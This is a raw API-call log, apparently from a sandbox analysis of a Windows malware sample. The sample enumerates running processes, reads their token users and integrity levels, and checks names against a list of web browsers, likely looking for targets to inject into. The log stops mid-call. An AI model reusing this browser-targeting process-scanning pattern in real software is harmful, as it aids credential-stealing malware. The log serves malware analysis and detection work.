0x265fb08 [0231.164] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0231.164] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0231.164] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0231.164] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0231.164] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0231.164] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0231.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0231.164] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.164] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.164] GetLastError () returned 0x7a [0231.164] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.164] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.164] CloseHandle (hObject=0xb8) returned 1 [0231.165] CloseHandle (hObject=0xb4) returned 1 [0231.165] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.165] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.165] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.165] GetLastError () returned 0x7a [0231.165] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.165] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.165] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.165] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0231.165] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0231.165] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0231.165] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0231.165] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0231.165] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0231.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0231.165] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.165] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.165] GetLastError () returned 0x7a [0231.165] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.166] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.166] CloseHandle (hObject=0xb8) returned 1 [0231.166] CloseHandle (hObject=0xb4) returned 1 [0231.166] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.166] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.166] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.166] GetLastError () returned 0x7a [0231.166] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.166] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.166] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.166] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0231.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0231.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0231.167] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.167] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.167] GetLastError () returned 0x7a [0231.167] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.167] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.167] CloseHandle (hObject=0xb8) returned 1 [0231.167] CloseHandle (hObject=0xb4) returned 1 [0231.167] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.167] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.167] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.167] GetLastError () returned 0x7a [0231.167] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.167] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.167] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.167] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0231.168] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0231.168] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0231.168] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0231.168] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0231.168] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0231.168] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.168] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0233.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0a0) returned 0xc0000004 [0233.182] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0233.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0233.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0233.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0233.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0233.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0233.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0233.186] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.186] GetLastError () returned 0x7a [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.186] CloseHandle (hObject=0xb8) returned 1 [0233.186] CloseHandle (hObject=0xb4) returned 1 [0233.186] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.186] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.186] GetLastError () returned 0x7a [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.186] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.186] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.186] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0233.186] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0233.186] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0233.186] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0233.186] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0233.186] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0233.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0233.186] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.186] GetLastError () returned 0x7a [0233.186] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.187] CloseHandle (hObject=0xb8) returned 1 [0233.187] CloseHandle (hObject=0xb4) returned 1 [0233.187] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.187] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.187] GetLastError () returned 0x7a [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.187] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.187] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.187] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0233.187] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0233.187] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0233.187] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0233.187] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0233.187] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0233.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0233.187] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.187] GetLastError () returned 0x7a [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.187] CloseHandle (hObject=0xb8) returned 1 [0233.187] CloseHandle (hObject=0xb4) returned 1 [0233.187] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.187] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.187] GetLastError () returned 0x7a [0233.187] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.187] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.187] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.187] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0233.187] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0233.187] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0233.187] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0233.187] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0233.187] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0233.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0233.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0233.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0233.188] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.188] GetLastError () returned 0x7a [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.188] CloseHandle (hObject=0xb8) returned 1 [0233.188] CloseHandle (hObject=0xb4) returned 1 [0233.188] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.188] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.188] GetLastError () returned 0x7a [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.188] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.188] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.188] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0233.188] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0233.188] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0233.188] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0233.188] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0233.188] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0233.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0233.188] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.188] GetLastError () returned 0x7a [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.188] CloseHandle (hObject=0xb8) returned 1 [0233.188] CloseHandle (hObject=0xb4) returned 1 [0233.188] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.188] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.188] GetLastError () returned 0x7a [0233.188] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.188] GetSidSubAuthorityCount 